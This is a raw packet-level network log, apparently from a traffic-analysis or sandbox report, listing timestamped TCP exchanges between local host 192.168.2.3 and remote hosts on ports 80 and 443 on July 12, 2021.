Jul 12, 2021 10:29:51.732004881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732028961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732048988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732070923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732076883 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732096910 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732108116 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732130051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732151031 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732177973 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732192993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732219934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732225895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732250929 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732264042 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732283115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732306004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732328892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732347965 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732358932 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732383966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732389927 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732408047 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732428074 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732439041 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732460022 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732481956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732501030 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732511997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732528925 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732547998 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732572079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732594967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732603073 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732625961 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732649088 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732659101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732681990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732697010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732719898 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732743979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732769012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732779026 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732798100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732819080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732831001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732851028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732876062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732882977 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732907057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732918978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.732938051 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732958078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732976913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.732990026 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733006001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733028889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733041048 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733062029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733071089 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733093023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733115911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733136892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733156919 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733169079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733181953 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733201027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733221054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733242989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733253002 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733277082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733294010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733311892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733335972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733357906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733367920 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733392000 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733414888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733438969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733448982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733462095 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733484983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733509064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733531952 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733544111 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733562946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733584881 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733594894 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733617067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733634949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733656883 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733664989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733686924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733705997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733724117 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733736038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733745098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733767033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733788013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733817101 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733829021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733838081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733860016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733880997 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733900070 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733912945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733937025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733958006 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.733978987 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.733993053 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734016895 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734025955 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.734050035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734066010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.734082937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734105110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734127045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734148026 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.734158993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734181881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734193087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.734215021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734225988 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.734246016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734265089 CEST	443	49762	45.154.13.94	192.168.2.3
Jul 12, 2021 10:29:51.734308958 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.734328985 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734350920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734373093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734407902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734435081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.734472036 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.734479904 CEST	49762	443	192.168.2.3	45.154.13.94
Jul 12, 2021 10:29:51.734493971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734806061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734827995 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734849930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734859943 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.734883070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734908104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734913111 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.734937906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734957933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734981060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.734988928 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735017061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735023975 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735044956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735065937 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735078096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735104084 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735135078 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735157967 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735183001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735205889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735215902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735239983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735260010 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735286951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735294104 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735317945 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735340118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735349894 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735371113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735398054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735424042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735450029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735462904 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735483885 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735502005 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735521078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735543966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735569954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735573053 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735598087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735620022 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735635042 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735656977 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735678911 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735698938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735711098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735733986 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735744953 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735765934 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735788107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735797882 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735820055 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735842943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735863924 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735877991 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735902071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735910892 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735934019 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735955000 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.735971928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.735996962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736021996 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.736030102 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736100912 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.736114025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736135960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736159086 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736182928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736207008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736217976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.736238003 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.736248016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736269951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736293077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736315966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736326933 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.736351013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736370087 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.736386061 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736397028 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.736419916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736443996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736468077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736489058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736511946 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736534119 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.736547947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736557961 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.736581087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736602068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736628056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736634016 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.736660004 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736682892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.736705065 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.736737013 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737082958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737165928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737205029 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737229109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737241983 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737266064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737274885 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737297058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737324953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737348080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737359047 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737380981 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737402916 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737425089 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737433910 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737456083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737464905 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737487078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737509012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737531900 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737545013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737571001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737581968 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737607002 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737631083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737642050 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737663984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737687111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737694979 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737720013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737740993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737750053 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737772942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737792015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737806082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737829924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737854958 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737876892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737888098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737907887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.737938881 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737967968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.737992048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738014936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738070965 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738076925 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738126993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738147974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738188982 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738209963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738248110 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738270044 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738279104 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738301992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738322973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738346100 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738356113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738379955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738389969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738432884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738445997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738466978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738491058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738512039 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738531113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738542080 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738560915 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738571882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738595009 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738625050 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738646030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738689899 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738708973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738732100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738782883 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738796949 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738821030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738879919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738892078 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738915920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738940001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738961935 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.738974094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.738997936 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739020109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739029884 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739048958 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739061117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739084005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739104033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739137888 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739152908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739175081 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739197016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739223003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739233971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739248991 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739274025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739296913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739321947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:51.739329100 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:51.739351988 CEST	80	49755	47.254.186.176	192.168.2.3
